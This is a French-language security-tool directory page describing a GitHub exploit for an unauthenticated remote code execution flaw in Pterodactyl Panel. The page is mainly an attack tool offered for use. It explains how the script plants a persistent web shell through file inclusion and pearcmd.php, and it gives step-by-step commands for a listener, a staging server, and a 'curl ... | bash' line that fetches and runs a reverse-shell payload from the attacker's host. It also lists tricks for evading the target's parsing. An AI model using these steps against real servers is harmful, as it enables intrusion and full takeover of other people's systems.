Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49132-Mods — Exploit automatisé pour CVE-2025-49132, une RCE critique non authentifiée dans Pterodactyl Panel. Tire parti de LFI via locale endpoint pour déployer des web shells persistants et obtenir un accès reverse shell. | Kitploit
Outils/GitHubGitHub/malw0re/cve-2025-49132-mods
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubmalw0re/cve-2025-49132-mods

CVE-2025-49132-Mods

Exploit automatisé pour CVE-2025-49132, une RCE critique non authentifiée dans Pterodactyl Panel. Tire parti de LFI via locale endpoint pour déployer des web shells persistants et obtenir un accès reverse shell.

Voir le dépôt
122il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-49132 - RCE Simple

Python CVE

📝 Vue d'ensemble

Ce dépôt contient un exploit spécialisé pour CVE-2025-49132, une vulnérabilité critique d'exécution de code à distance (RCE) sans authentification dans le panneau Pterodactyl (versions antérieures à v1.11.11).

La vulnérabilité réside dans le point de terminaison /locales/locale.json. En manipulant les paramètres de requête locale et namespace, un attaquant peut tirer parti d'une inclusion de fichier local (LFI) pour interagir avec pearcmd.php. Cela permet la création arbitraire de fichiers et l'exécution de commandes, conduisant à un compromis complet du système.

⚙️ Chaîne d'exploitation

Le script ape.py automatise les étapes suivantes :

Découverte de PEAR : Fuzz la structure de répertoires pour localiser l'installation de PEAR sur la cible.

Création de backdoor : Utilise config-create de PEAR pour écrire un shell web persistant dans /tmp/shell.php.

🚀 Instructions d'utilisation

Pour obtenir un callback réussi sur la cible, suivez ce flux de travail :

  1. Préparation Écouteur : Lancez Penelope (ou votre écouteur préféré) dans un terminal séparé :

penelope -p 4444

Serveur de staging : Si vous utilisez un script shell personnalisé, hébergez-le via Python : python3 -m http.server 8080

  1. Exécution Exécutez le script en mode interactif pour garder le contrôle du processus d'exploitation :

python3 ape.py --host xxx.xxx.xxx --interactive

  1. Récupération du shell Dans l'invite shell>, utilisez la commande suivante pour exécuter votre payload mis en scène :

shell> curl http://<YOUR_IP>:8080/shell.sh | bash

🛡️ Mesures de protection techniques

Contournement d'espaces : Utilise automatiquement ${IFS} pour garantir que les payloads survivent au parsing d'URL.

Encapsulation Base64 : Enveloppe les commandes de reverse shell en Base64 pour éviter la corruption des caractères par le serveur Nginx/Web cible.

Gestion des timeouts : Conçue pour détecter quand un reverse shell s'est connecté avec succès même si la requête web reste en attente.

Télécharger l’outil